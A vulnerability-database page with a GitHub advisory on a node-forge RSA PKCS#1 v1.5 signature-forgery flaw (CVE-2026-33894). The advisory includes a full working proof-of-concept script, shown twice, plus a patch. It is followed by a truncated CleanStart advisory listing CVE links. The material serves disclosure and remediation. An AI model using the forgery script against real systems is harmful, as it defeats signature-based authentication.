Action not permitted
Modal body text goes here.
Modal Title
Modal Body
GHSA-PPP5-5V6C-4JWP
Vulnerability from github – Published: 2026-03-26 22:02 – Updated: 2026-03-27 21:50Summary
RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.
Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries.
Impacted Deployments
Tested commit: 8e1d527fe8ec2670499068db783172d4fb9012e5
Affected versions: tested on v1.3.3 (latest release) and recent prior versions.
Configuration assumptions:
- Invoke key.verify with defaults (default scheme uses RSASSA-PKCS1-v1_5).
- _parseAllDigestBytes: true (default setting).
Root Cause
In lib/rsa.js, key.verify(...), forge decrypts the signature block, decodes PKCS#1 v1.5 padding (_decodePkcs1_v1_5), parses ASN.1, and compares capture.digest to the provided digest.
Two issues are present with this logic:
- Strict DER byte-consumption (
_parseAllDigestBytes) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it. _decodePkcs1_v1_5comments mention that PS < 8 bytes should be rejected, but does not implement this logic.
Reproduction Steps
- Use Node.js (tested with
v24.9.0) and clonedigitalbazaar/forgeat commit8e1d527fe8ec2670499068db783172d4fb9012e5. - Place and run the PoC script (
repro_min.js) withnode repro_min.jsin the same level as theforgefolder. - The script generates a fresh RSA keypair (
4096bits,e=3), creates a normal control signature, then computes a forged candidate using cube-root interval construction. - The script verifies both signatures with:
- forge verify (
_parseAllDigestBytes: true), and - Node/OpenSSL verify (
crypto.verifywithRSA_PKCS1_PADDING). - Confirm output includes:
control-forge-strict: truecontrol-node: trueforgery (forge library, strict): trueforgery (node/OpenSSL): false
Proof of Concept
Overview:
- Demonstrates a valid control signature and a forged signature in one run.
- Uses strict forge parsing mode explicitly (_parseAllDigestBytes: true, also forge default).
- Uses Node/OpenSSL as an differential verification baseline.
- Observed output on tested commit:
control-forge-strict: true
control-node: true
forgery (forge library, strict): true
forgery (node/OpenSSL): false
repro_min.js
#!/usr/bin/env node
'use strict';
const crypto = require('crypto');
const forge = require('./forge/lib/index');
// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
// SEQUENCE {
// SEQUENCE { OID sha256, NULL },
// OCTET STRING <32-byte digest>
// }
// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
const DIGESTINFO_SHA256_PREFIX = Buffer.from(
'300d060960864801650304020105000420',
'hex'
);
const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));
function toBuf(n, len) {
let h = n.toString(16);
if (h.length % 2) h = '0' + h;
const b = Buffer.from(h, 'hex');
return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
}
function cbrtFloor(n) {
let lo = 0n;
let hi = 1n;
while (hi * hi * hi <= n) hi <<= 1n;
while (lo + 1n < hi) {
const mid = (lo + hi) >> 1n;
if (mid * mid * mid <= n) lo = mid;
else hi = mid;
}
return lo;
}
const cbrtCeil = n => {
const f = cbrtFloor(n);
return f * f * f === n ? f : f + 1n;
};
function derLen(len) {
if (len < 0x80) return Buffer.from([len]);
if (len <= 0xff) return Buffer.from([0x81, len]);
return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
}
function forgeStrictVerify(publicPem, msg, sig) {
const key = forge.pki.publicKeyFromPem(publicPem);
const md = forge.md.sha256.create();
md.update(msg.toString('utf8'), 'utf8');
try {
// verify(digestBytes, signatureBytes, scheme, options):
// - digestBytes: raw SHA-256 digest bytes for `msg`
// - signatureBytes: binary-string representation of the candidate signature
// - scheme: undefined => default RSASSA-PKCS1-v1_5
// - options._parseAllDigestBytes: require DER parser to consume all bytes
// (this is forge's default for verify; set explicitly here for clarity)
return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
} catch (err) {
return { ok: false, err: err.message };
}
}
function main() {
const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
modulusLength: 4096,
publicExponent: 3,
privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
});
const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
const nBytes = Buffer.from(jwk.n, 'base64url');
const n = toBig(nBytes);
const e = toBig(Buffer.from(jwk.e, 'base64url'));
if (e !== 3n) throw new Error('expected e=3');
const msg = Buffer.from('forged-message-0', 'utf8');
const digest = crypto.createHash('sha256').update(msg).digest();
const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);
// Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
const k = nBytes.length;
// ffCount can be set to any value at or below 111 and produce a valid signature.
// ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.
// However, current versions of node forge do not check for this.
// Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.
const ffCount = 0;
// `garbageLen` affects DER length field sizes, which in turn affect how
// many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.
// A small cap (8) is enough here: DER length-size transitions are discrete
// and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
let garbageLen = 0;
for (let i = 0; i < 8; i += 1) {
const gLenEnc = derLen(garbageLen).length;
const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
const seqLenEnc = derLen(seqLen).length;
const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
const next = k - fixed;
if (next === garbageLen) break;
garbageLen = next;
}
const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
const prefix = Buffer.concat([
Buffer.from([0x00, 0x01]),
Buffer.alloc(ffCount, 0xff),
Buffer.from([0x00]),
Buffer.from([0x30]), derLen(seqLen),
algAndDigest,
Buffer.from([0x04]), derLen(garbageLen)
]);
// Build the numeric interval of all EM values that start with `prefix`:
// - `low` = prefix || 00..00
// - `high` = one past (prefix || ff..ff)
// Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
const suffixLen = k - prefix.length;
const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
const high = low + (1n << BigInt(8 * suffixLen));
const s = cbrtCeil(low);
if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');
const sig = toBuf(s, k);
const controlMsg = Buffer.from('control-message', 'utf8');
const controlSig = crypto.sign('sha256', controlMsg, {
key: privateKey,
padding: crypto.constants.RSA_PKCS1_PADDING
});
// forge verification calls (library under test)
const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
const forgedForge = forgeStrictVerify(publicKey, msg, sig);
// Node.js verification calls (OpenSSL-backed reference behavior)
const controlNode = crypto.verify('sha256', controlMsg, {
key: publicKey,
padding: crypto.constants.RSA_PKCS1_PADDING
}, controlSig);
const forgedNode = crypto.verify('sha256', msg, {
key: publicKey,
padding: crypto.constants.RSA_PKCS1_PADDING
}, sig);
console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
console.log('control-node:', controlNode);
console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
console.log('forgery (node/OpenSSL):', forgedNode);
}
main();
Suggested Patch
- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (
PS >= 8) in_decodePkcs1_v1_5before accepting the block. - Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).
Here is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:
index b207a63..ec8a9c1 100644
--- a/lib/rsa.js
+++ b/lib/rsa.js
@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {
error.errors = errors;
throw error;
}
+
+ if(obj.value.length != 2) {
+ var error = new Error(
+ 'DigestInfo ASN.1 object must contain exactly 2 fields for ' +
+ 'a valid RSASSA-PKCS1-v1_5 package.');
+ error.errors = errors;
+ throw error;
+ }
// check hash algorithm identifier
// see PKCS1-v1-5DigestAlgorithms in RFC 8017
// FIXME: add support to validator for strict value choices
@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {
}
++padNum;
}
+
+ if (padNum < 8) {
+ throw new Error('Encryption block is invalid.');
+ }
} else if(bt === 0x02) {
// look for 0x00 byte
padNum = 0;
Resources
- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8
-
This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition.
- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html
lib/rsa.jskey.verify(...)at lines ~1139-1223.lib/rsa.js_decodePkcs1_v1_5(...)at lines ~1632-1695.
Credit
This vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33894"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T22:02:35Z",
"nvd_published_at": "2026-03-27T21:17:25Z",
"severity": "HIGH"
},
"details": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS \u003c 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n - forge verify (`_parseAllDigestBytes: true`), and\n - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n - `control-forge-strict: true`\n - `control-node: true`\n - `forgery (forge library, strict): true`\n - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n\u003cdetails\u003e\u003csummary\u003erepro_min.js\u003c/summary\u003e\n\n```javascript\n#!/usr/bin/env node\n\u0027use strict\u0027;\n\nconst crypto = require(\u0027crypto\u0027);\nconst forge = require(\u0027./forge/lib/index\u0027);\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n// SEQUENCE { OID sha256, NULL },\n// OCTET STRING \u003c32-byte digest\u003e\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n \u0027300d060960864801650304020105000420\u0027,\n \u0027hex\u0027\n);\n\nconst toBig = b =\u003e BigInt(\u00270x\u0027 + (b.toString(\u0027hex\u0027) || \u00270\u0027));\nfunction toBuf(n, len) {\n let h = n.toString(16);\n if (h.length % 2) h = \u00270\u0027 + h;\n const b = Buffer.from(h, \u0027hex\u0027);\n return b.length \u003c len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n let lo = 0n;\n let hi = 1n;\n while (hi * hi * hi \u003c= n) hi \u003c\u003c= 1n;\n while (lo + 1n \u003c hi) {\n const mid = (lo + hi) \u003e\u003e 1n;\n if (mid * mid * mid \u003c= n) lo = mid;\n else hi = mid;\n }\n return lo;\n}\nconst cbrtCeil = n =\u003e {\n const f = cbrtFloor(n);\n return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n if (len \u003c 0x80) return Buffer.from([len]);\n if (len \u003c= 0xff) return Buffer.from([0x81, len]);\n return Buffer.from([0x82, (len \u003e\u003e 8) \u0026 0xff, len \u0026 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n const key = forge.pki.publicKeyFromPem(publicPem);\n const md = forge.md.sha256.create();\n md.update(msg.toString(\u0027utf8\u0027), \u0027utf8\u0027);\n try {\n // verify(digestBytes, signatureBytes, scheme, options):\n // - digestBytes: raw SHA-256 digest bytes for `msg`\n // - signatureBytes: binary-string representation of the candidate signature\n // - scheme: undefined =\u003e default RSASSA-PKCS1-v1_5\n // - options._parseAllDigestBytes: require DER parser to consume all bytes\n // (this is forge\u0027s default for verify; set explicitly here for clarity)\n return { ok: key.verify(md.digest().getBytes(), sig.toString(\u0027binary\u0027), undefined, { _parseAllDigestBytes: true }) };\n } catch (err) {\n return { ok: false, err: err.message };\n }\n}\n\nfunction main() {\n const { privateKey, publicKey } = crypto.generateKeyPairSync(\u0027rsa\u0027, {\n modulusLength: 4096,\n publicExponent: 3,\n privateKeyEncoding: { type: \u0027pkcs1\u0027, format: \u0027pem\u0027 },\n publicKeyEncoding: { type: \u0027pkcs1\u0027, format: \u0027pem\u0027 }\n });\n\n const jwk = crypto.createPublicKey(publicKey).export({ format: \u0027jwk\u0027 });\n const nBytes = Buffer.from(jwk.n, \u0027base64url\u0027);\n const n = toBig(nBytes);\n const e = toBig(Buffer.from(jwk.e, \u0027base64url\u0027));\n if (e !== 3n) throw new Error(\u0027expected e=3\u0027);\n\n const msg = Buffer.from(\u0027forged-message-0\u0027, \u0027utf8\u0027);\n const digest = crypto.createHash(\u0027sha256\u0027).update(msg).digest();\n const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n const k = nBytes.length;\n // ffCount can be set to any value at or below 111 and produce a valid signature.\n // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n // However, current versions of node forge do not check for this.\n // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n const ffCount = 0; \n // `garbageLen` affects DER length field sizes, which in turn affect how\n // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n // A small cap (8) is enough here: DER length-size transitions are discrete\n // and few (\u003c128, \u003c=255, \u003c=65535, ...), so this stabilizes quickly.\n let garbageLen = 0;\n for (let i = 0; i \u003c 8; i += 1) {\n const gLenEnc = derLen(garbageLen).length;\n const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n const seqLenEnc = derLen(seqLen).length;\n const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n const next = k - fixed;\n if (next === garbageLen) break;\n garbageLen = next;\n }\n const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;\n const prefix = Buffer.concat([\n Buffer.from([0x00, 0x01]),\n Buffer.alloc(ffCount, 0xff),\n Buffer.from([0x00]),\n Buffer.from([0x30]), derLen(seqLen),\n algAndDigest,\n Buffer.from([0x04]), derLen(garbageLen)\n ]);\n\n // Build the numeric interval of all EM values that start with `prefix`:\n // - `low` = prefix || 00..00\n // - `high` = one past (prefix || ff..ff)\n // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n const suffixLen = k - prefix.length;\n const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n const high = low + (1n \u003c\u003c BigInt(8 * suffixLen));\n const s = cbrtCeil(low);\n if (s \u003e cbrtFloor(high - 1n) || s \u003e= n) throw new Error(\u0027no candidate in interval\u0027);\n\n const sig = toBuf(s, k);\n\n const controlMsg = Buffer.from(\u0027control-message\u0027, \u0027utf8\u0027);\n const controlSig = crypto.sign(\u0027sha256\u0027, controlMsg, {\n key: privateKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n });\n\n // forge verification calls (library under test)\n const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n // Node.js verification calls (OpenSSL-backed reference behavior)\n const controlNode = crypto.verify(\u0027sha256\u0027, controlMsg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, controlSig);\n const forgedNode = crypto.verify(\u0027sha256\u0027, msg, {\n key: publicKey,\n padding: crypto.constants.RSA_PKCS1_PADDING\n }, sig);\n\n console.log(\u0027control-forge-strict:\u0027, controlForge.ok, controlForge.err || \u0027\u0027);\n console.log(\u0027control-node:\u0027, controlNode);\n console.log(\u0027forgery (forge library, strict):\u0027, forgedForge.ok, forgedForge.err || \u0027\u0027);\n console.log(\u0027forgery (node/OpenSSL):\u0027, forgedNode);\n}\n\nmain();\n```\n\u003c/details\u003e\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS \u003e= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n error.errors = errors;\n throw error;\n }\n+\n+ if(obj.value.length != 2) {\n+ var error = new Error(\n+ \u0027DigestInfo ASN.1 object must contain exactly 2 fields for \u0027 +\n+ \u0027a valid RSASSA-PKCS1-v1_5 package.\u0027);\n+ error.errors = errors;\n+ throw error;\n+ }\n // check hash algorithm identifier\n // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n }\n ++padNum;\n }\n+\n+ if (padNum \u003c 8) {\n+ throw new Error(\u0027Encryption block is invalid.\u0027);\n+ }\n } else if(bt === 0x02) {\n // look for 0x00 byte\n padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n - \u003e This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
"id": "GHSA-ppp5-5v6c-4jwp",
"modified": "2026-03-27T21:50:55Z",
"published": "2026-03-26T22:02:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
},
{
"type": "WEB",
"url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
},
{
"type": "WEB",
"url": "https://www.rfc-editor.org/rfc/rfc8017.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Forge has signature forgery in RSA-PKCS due to ASN.1 extra field "
}
cleanstart-2026-be61221
Vulnerability from cleanstart
Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "opensearch-dashboards-fips"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.19.5-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-BE61221",
"modified": "2026-05-10T11:41:43Z",
"published": "2026-05-18T13:36:50.922233Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-BE61221.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29045"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29085"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29086"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29087"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-30827"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33891"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33894"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33895"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33896"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34043"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35213"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39406"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39407"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39408"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39409"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39410"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-40175"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41238"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41239"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41240"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42033"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42034"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42035"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42037"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42038"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42039"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42040"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42041"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42042"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42043"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42044"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42264"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42338"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44455"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44456"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44457"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44458"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44459"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4923"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4926"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-6321"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-6322"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-26pp-8wgv-hjvm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-27v5-c462-wpq7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-39q2-94rc-95cp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3w6x-2g7m-8v23"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-442j-39wm-28r2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-445q-vr5w-6q77"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-458j-xx4x-4375"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-46wh-pxpv-q5gq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5c6j-r48x-rmvq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5c9x-8gcm-mpgx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5pq2-9x2x-5p6w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-62hf-57xw-28j9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-69xw-7hcm-h432"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-92pp-h63x-v22m"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9vqf-7f2p-gf9v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-crv5-9vww-q3g8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h7mw-gpvr-xq4m"
},
{
